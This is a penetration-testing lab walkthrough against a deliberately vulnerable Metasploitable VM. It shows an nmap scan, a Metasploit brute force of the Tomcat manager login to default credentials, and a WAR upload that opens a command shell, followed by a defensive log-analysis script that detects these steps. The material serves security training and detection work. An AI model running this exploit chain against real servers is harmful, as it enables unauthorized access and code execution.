- Systems used
Kali Linux
Metasploitable V2 Linux
(Kali)
- Check the target system's open ports and service versions
# nmap -sV -p 1-65535 192.168.17.134
Starting Nmap 7.40 ( https://nmap.org ) at 2017-11-10 18:38 KST
Stats: 0:01:35 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 96.67% done; ETC: 18:39 (0:00:03 remaining)
Nmap scan report for 192.168.17.134
Host is up (0.00069s latency).
Not shown: 65505 closed ports
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4
22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp    open  telnet      Linux telnetd
25/tcp    open  smtp        Postfix smtpd
53/tcp    open  domain      ISC BIND 9.4.2
80/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp   open  rpcbind     2 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp   open  exec        netkit-rsh rexecd
513/tcp   open  login?
514/tcp   open  tcpwrapped
1099/tcp  open  rmiregistry GNU Classpath grmiregistry
1524/tcp  open  shell       Metasploitable root shell
2049/tcp  open  nfs         2-4 (RPC #100003)
2121/tcp  open  ftp         ProFTPD 1.3.1
3306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5
3632/tcp  open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp  open  vnc         VNC (protocol 3.3)
6000/tcp  open  X11         (access denied)
6667/tcp  open  irc         UnrealIRCd
6697/tcp  open  irc         UnrealIRCd (Admin email admin@Metasploitable.LAN)
8009/tcp  open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
8787/tcp  open  drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
33171/tcp open  nlockmgr    1-4 (RPC #100021)
42596/tcp open  mountd      1-3 (RPC #100005)
49854/tcp open  status      1 (RPC #100024)
59001/tcp open  unknown
MAC Address: 00:0C:29:FA:DD:2A (VMware)
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 156.18 seconds
- Open the default home page
# firefox http://192.168.17.134:8180/ &
- Open the manager page
# firefox http://192.168.17.134:8180/manager/html &
(Note) Do not close this window.
- Run a dictionary attack against the Tomcat manager page
# msfconsole
Call trans opt: received. 2-19-98 13:24:18 REC:Loc
Trace program: running

wake up, Neo...
the matrix has you
follow the white rabbit.

knock, knock, Neo.

http://metasploit.com

Trouble managing data? List, sort, group, tag and search your pentest data
in Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.14.10-dev                          ]
+ -- --=[ 1639 exploits - 944 auxiliary - 289 post        ]
+ -- --=[ 472 payloads - 40 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > search tomcat

Matching Modules
================

   Name                                                         Disclosure Date  Rank       Description
   ----                                                         ---------------  ----       -----------
   auxiliary/admin/http/tomcat_administration                                    normal     Tomcat Administration Tool Default Access
   auxiliary/admin/http/tomcat_utf8_traversal                   2009-01-09       normal     Tomcat UTF-8 Directory Traversal Vulnerability
   auxiliary/admin/http/trendmicro_dlp_traversal                2009-01-09       normal     TrendMicro Data Loss Prevention 5.5 Directory Traversal
   auxiliary/dos/http/apache_commons_fileupload_dos             2014-02-06       normal     Apache Commons FileUpload and Apache Tomcat DoS
   auxiliary/dos/http/apache_tomcat_transfer_encoding           2010-07-09       normal     Apache Tomcat Transfer-Encoding Information Disclosure and DoS
   auxiliary/dos/http/hashcollision_dos                         2011-12-28       normal     Hashtable Collisions
   auxiliary/scanner/http/tomcat_enum                                            normal     Apache Tomcat User Enumeration
   auxiliary/scanner/http/tomcat_mgr_login                                       normal     Tomcat Application Manager Login Utility
   exploit/multi/http/struts_code_exec_classloader              2014-03-06       manual     Apache Struts ClassLoader Manipulation Remote Code Execution
   exploit/multi/http/struts_dev_mode                           2012-01-06       excellent  Apache Struts 2 Developer Mode OGNL Execution
   exploit/multi/http/tomcat_mgr_deploy                         2009-11-09       excellent  Apache Tomcat Manager Application Deployer Authenticated Code Execution
   exploit/multi/http/tomcat_mgr_upload                         2009-11-09       excellent  Apache Tomcat Manager Authenticated Upload Code Execution
   exploit/multi/http/zenworks_configuration_management_upload  2015-04-07       excellent  Novell ZENworks Configuration Management Arbitrary File Upload
   post/multi/gather/tomcat_gather                                               normal     Gather Tomcat Credentials
   post/windows/gather/enum_tomcat                                               normal     Windows Gather Apache Tomcat Enumeration

msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > show options

Module options (auxiliary/scanner/http/tomcat_mgr_login):

   Name              Current Setting                                                                 Required  Description
   ----              ---------------                                                                 --------  -----------
   BLANK_PASSWORDS   false                                                                           no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                                               yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                                                           no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                                           no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                                           no        Add all users in the current database to the list
   PASSWORD                                                                                          no        The HTTP password to specify for authentication
   PASS_FILE         /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt      no        File containing passwords, one per line
   Proxies                                                                                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                                                            yes       The target address range or CIDR identifier
   RPORT             8080                                                                            yes       The target port (TCP)
   SSL               false                                                                           no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false                                                                           yes       Stop guessing when a credential works for a host
   TARGETURI         /manager/html                                                                   yes       URI for Manager login. Default is /manager/html
   THREADS           1                                                                               yes       The number of concurrent threads
   USERNAME                                                                                          no        The HTTP username to specify for authentication
   USERPASS_FILE     /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt  no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false                                                                           no        Try the username as the password for all users
   USER_FILE         /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt     no        File containing users, one per line
   VERBOSE           true                                                                            yes       Whether to print output for all attempts
   VHOST                                                                                             no        HTTP server virtual host

msf auxiliary(tomcat_mgr_login) > set rhosts 192.168.17.134
rhosts => 192.168.17.134
msf auxiliary(tomcat_mgr_login) > set rport 8180
rport => 8180
msf auxiliary(tomcat_mgr_login) > exploit

[-] 192.168.17.134:8180 - LOGIN FAILED: admin:admin (Incorrect)
[-] 192.168.17.134:8180 - LOGIN FAILED: admin:manager (Incorrect)
[-] 192.168.17.134:8180 - LOGIN FAILED: admin:role1 (Incorrect)
[-] 192.168.17.134:8180 - LOGIN FAILED: admin:root (Incorrect)
[-] 192.168.17.134:8180 - LOGIN FAILED: admin:tomcat (Incorrect)
[-] 192.168.17.134:8180 - LOGIN FAILED: admin:s3cret (Incorrect)
[-] 192.168.17.134:8180 - LOGIN FAILED: admin:vagrant (Incorrect)
[-] 192.168.17.134:8180 - LOGIN FAILED: manager:admin (Incorrect)
[-] 192.168.17.134:8180 - LOGIN FAILED: manager:manager (Incorrect)
[-] 192.168.17.134:8180 - LOGIN FAILED: manager:role1 (Incorrect)
[-] 192.168.17.134:8180 - LOGIN FAILED: manager:root (Incorrect)
[-] 192.168.17.134:8180 - LOGIN FAILED: manager:tomcat (Incorrect)
[-] 192.168.17.134:8180 - LOGIN FAILED: manager:s3cret (Incorrect)
[-] 192.168.17.134:8180 - LOGIN FAILED: manager:vagrant (Incorrect)
[-] 192.168.17.134:8180 - LOGIN FAILED: role1:admin (Incorrect)
[-] 192.168.17.134:8180 - LOGIN FAILED: role1:manager (Incorrect)
[-] 192.168.17.134:8180 - LOGIN FAILED: role1:role1 (Incorrect)
[-] 192.168.17.134:8180 - LOGIN FAILED: role1:root (Incorrect)
[-] 192.168.17.134:8180 - LOGIN FAILED: role1:tomcat (Incorrect)
[-] 192.168.17.134:8180 - LOGIN FAILED: role1:s3cret (Incorrect)
[-] 192.168.17.134:8180 - LOGIN FAILED: role1:vagrant (Incorrect)
[-] 192.168.17.134:8180 - LOGIN FAILED: root:admin (Incorrect)
[-] 192.168.17.134:8180 - LOGIN FAILED: root:manager (Incorrect)
[-] 192.168.17.134:8180 - LOGIN FAILED: root:role1 (Incorrect)
[-] 192.168.17.134:8180 - LOGIN FAILED: root:root (Incorrect)
[-] 192.168.17.134:8180 - LOGIN FAILED: root:tomcat (Incorrect)
[-] 192.168.17.134:8180 - LOGIN FAILED: root:s3cret (Incorrect)
[-] 192.168.17.134:8180 - LOGIN FAILED: root:vagrant (Incorrect)
[-] 192.168.17.134:8180 - LOGIN FAILED: tomcat:admin (Incorrect)
[-] 192.168.17.134:8180 - LOGIN FAILED: tomcat:manager (Incorrect)
[-] 192.168.17.134:8180 - LOGIN FAILED: tomcat:role1 (Incorrect)
[-] 192.168.17.134:8180 - LOGIN FAILED: tomcat:root (Incorrect)
[+] 192.168.17.134:8180 - LOGIN SUCCESSFUL: tomcat:tomcat
[-] 192.168.17.134:8180 - LOGIN FAILED: both:admin (Incorrect)
[-] 192.168.17.134:8180 - LOGIN FAILED: both:manager (Incorrect)
[-] 192.168.17.134:8180 - LOGIN FAILED: both:role1 (Incorrect)
[-] 192.168.17.134:8180 - LOGIN FAILED: both:root (Incorrect)
[-] 192.168.17.134:8180 - LOGIN FAILED: both:tomcat (Incorrect)
[-] 192.168.17.134:8180 - LOGIN FAILED: both:s3cret (Incorrect)
[-] 192.168.17.134:8180 - LOGIN FAILED: both:vagrant (Incorrect)
[-] 192.168.17.134:8180 - LOGIN FAILED: j2deployer:j2deployer (Incorrect)
[-] 192.168.17.134:8180 - LOGIN FAILED: ovwebusr:OvW*busr1 (Incorrect)
[-] 192.168.17.134:8180 - LOGIN FAILED: cxsdk:kdsxc (Incorrect)
[-] 192.168.17.134:8180 - LOGIN FAILED: root:owaspbwa (Incorrect)
[-] 192.168.17.134:8180 - LOGIN FAILED: ADMIN:ADMIN (Incorrect)
[-] 192.168.17.134:8180 - LOGIN FAILED: xampp:xampp (Incorrect)
[-] 192.168.17.134:8180 - LOGIN FAILED: QCC:QLogic66 (Incorrect)
[-] 192.168.17.134:8180 - LOGIN FAILED: admin:vagrant (Incorrect)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
> Found the credentials: ID/PASS tomcat / tomcat.
- Log in to the manager page opened earlier with that ID/PASS
> Login successful
- Check whether the WAR file upload form at the bottom of the manager page is usable
> Upload vulnerability
# msfconsole
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > show options

Module options (exploit/multi/http/tomcat_mgr_deploy):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword                   no        The password for the specified username
   HttpUsername                   no        The username to authenticate as
   PATH          /manager         yes       The URI path of the manager app (/deploy and /undeploy will be used)
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                          yes       The target address
   RPORT         80               yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                          no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat
HttpPassword => tomcat
msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat
HttpUsername => tomcat
msf exploit(tomcat_mgr_deploy) > set rhost 192.168.17.134
rhost => 192.168.17.134
msf exploit(tomcat_mgr_deploy) > set rport 8180
rport => 8180
msf exploit(tomcat_mgr_deploy) > show payloads

Compatible Payloads
===================

   Name                            Disclosure Date  Rank    Description
   ----                            ---------------  ----    -----------
   generic/custom                                   normal  Custom Payload
   generic/shell_bind_tcp                           normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                        normal  Generic Command Shell, Reverse TCP Inline
   java/meterpreter/bind_tcp                        normal  Java Meterpreter, Java Bind TCP Stager
   java/meterpreter/reverse_http                    normal  Java Meterpreter, Java Reverse HTTP Stager
   java/meterpreter/reverse_https                   normal  Java Meterpreter, Java Reverse HTTPS Stager
   java/meterpreter/reverse_tcp                     normal  Java Meterpreter, Java Reverse TCP Stager
   java/shell/bind_tcp                              normal  Command Shell, Java Bind TCP Stager
   java/shell/reverse_tcp                           normal  Command Shell, Java Reverse TCP Stager
   java/shell_reverse_tcp                           normal  Java Command Shell, Reverse TCP Inline

msf exploit(tomcat_mgr_deploy) > set payload java/shell/bind_tcp
payload => java/shell/bind_tcp
msf exploit(tomcat_mgr_deploy) > show options

Module options (exploit/multi/http/tomcat_mgr_deploy):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword  tomcat           no        The password for the specified username
   HttpUsername  tomcat           no        The username to authenticate as
   PATH          /manager         yes       The URI path of the manager app (/deploy and /undeploy will be used)
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST         192.168.17.134   yes       The target address
   RPORT         8180             yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                          no        HTTP server virtual host

Payload options (java/shell/bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  192.168.17.134   no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(tomcat_mgr_deploy) > exploit

[*] Started bind handler
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 6073 bytes as TZV7fXdHuYfvAcaAX4css9b5emJ.war ...
[*] Executing /TZV7fXdHuYfvAcaAX4css9b5emJ/1VCOf4gAD4yRoVxmKiMUtk.jsp...
[*] Undeploying TZV7fXdHuYfvAcaAX4css9b5emJ ...
[*] Sending stage (2952 bytes) to 192.168.17.134
[*] Command shell session 1 opened (192.168.17.50:35691 -> 192.168.17.134:4444) at 2017-11-10 18:59:13 +0900

hostname
metasploitable
dir
bin    dev   initrd      lost+found  nohup.out  root  sys  var
boot   etc   initrd.img  media       opt        sbin  tmp  vmlinuz
cdrom  home  lib         mnt         proc       srv   usr
id
uid=110(tomcat55) gid=65534(nogroup) groups=65534(nogroup)
which gcc
/usr/bin/gcc
cd /tmp
echo '#include<stdio.h>' > test.c
echo 'main() { printf("hello\n"); }' >> test.c
gcc -o test test.c
./test
hello
exit
[*] 192.168.17.134 - Command shell session 1 closed.  Reason: Died from EOFError
msf exploit(tomcat_mgr_deploy) > quit
> Because Tomcat is the server side, a bind_tcp payload is used.
> We obtained the manager's privileges, and since gcc was confirmed to be present, malicious code can be placed on the system and executed.
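From the defender's side, both phases above leave a clear trace in Tomcat's access log: the tomcat_mgr_login run produces a burst of 401 responses on /manager/html from one source followed by a 200, and tomcat_mgr_deploy then issues a PUT to /manager/deploy?path=... and a GET into the new context. The script below is an added example, not part of the original post; the log lines, the common-log-format layout and the failure threshold are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed sample lines (Tomcat common access-log format) modelled on this page's
# session: failed manager logins, one success, a WAR deployed, its JSP run, one stray 401.
SAMPLE_LOG = """\
192.168.17.50 - - [10/Nov/2017:18:50:01 +0900] "GET /manager/html HTTP/1.1" 401 2473
192.168.17.50 - - [10/Nov/2017:18:50:01 +0900] "GET /manager/html HTTP/1.1" 401 2473
192.168.17.50 - - [10/Nov/2017:18:50:02 +0900] "GET /manager/html HTTP/1.1" 401 2473
192.168.17.50 - tomcat [10/Nov/2017:18:50:03 +0900] "GET /manager/html HTTP/1.1" 200 13571
192.168.17.50 - tomcat [10/Nov/2017:18:59:10 +0900] "PUT /manager/deploy?path=/TZV7fXdHuYfvAcaAX4css9b5emJ HTTP/1.1" 200 68
192.168.17.50 - - [10/Nov/2017:18:59:11 +0900] "GET /TZV7fXdHuYfvAcaAX4css9b5emJ/1VCOf4gAD4yRoVxmKiMUtk.jsp HTTP/1.1" 200 0
10.0.0.7 - - [10/Nov/2017:19:01:00 +0900] "GET /manager/html HTTP/1.1" 401 2473
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$')

def parse(log_text):
    """Yield one dict per well-formed access-log line; malformed lines are skipped."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.groupdict()

def analyse(log_text, fail_threshold=3):
    """Return per-source findings: brute_force (>= fail_threshold 401s on /manager),
    cred_guessed (a later 200 from /manager after that), deployed (contexts created
    via /manager/deploy or /manager/html/upload) and executed (requests the same
    source then made into one of those contexts, i.e. the uploaded code running)."""
    fails = defaultdict(int)
    found = defaultdict(lambda: {"brute_force": False, "cred_guessed": False,
                                 "deployed": [], "executed": 0})
    for r in parse(log_text):
        ip, path, status = r["ip"], r["path"], r["status"]
        if any(path.startswith(ctx + "/") for ctx in found[ip]["deployed"]):
            found[ip]["executed"] += 1
        if not path.startswith("/manager"):
            continue
        if status == "401":
            fails[ip] += 1
            found[ip]["brute_force"] = fails[ip] >= fail_threshold
        elif status == "200":
            found[ip]["cred_guessed"] |= found[ip]["brute_force"]
            if path.startswith(("/manager/deploy?", "/manager/html/upload")):
                # /manager/html/upload carries the context name inside the WAR, not the URL
                ctx = path.split("path=", 1)[1].split("&", 1)[0] if "path=" in path else "?"
                found[ip]["deployed"].append(ctx)
    return {ip: f for ip, f in found.items() if f["brute_force"] or f["deployed"]}
```

A single 401 from an unrelated source is not reported; the same logic run over the real log of the session above would flag 192.168.17.50 on all four counts.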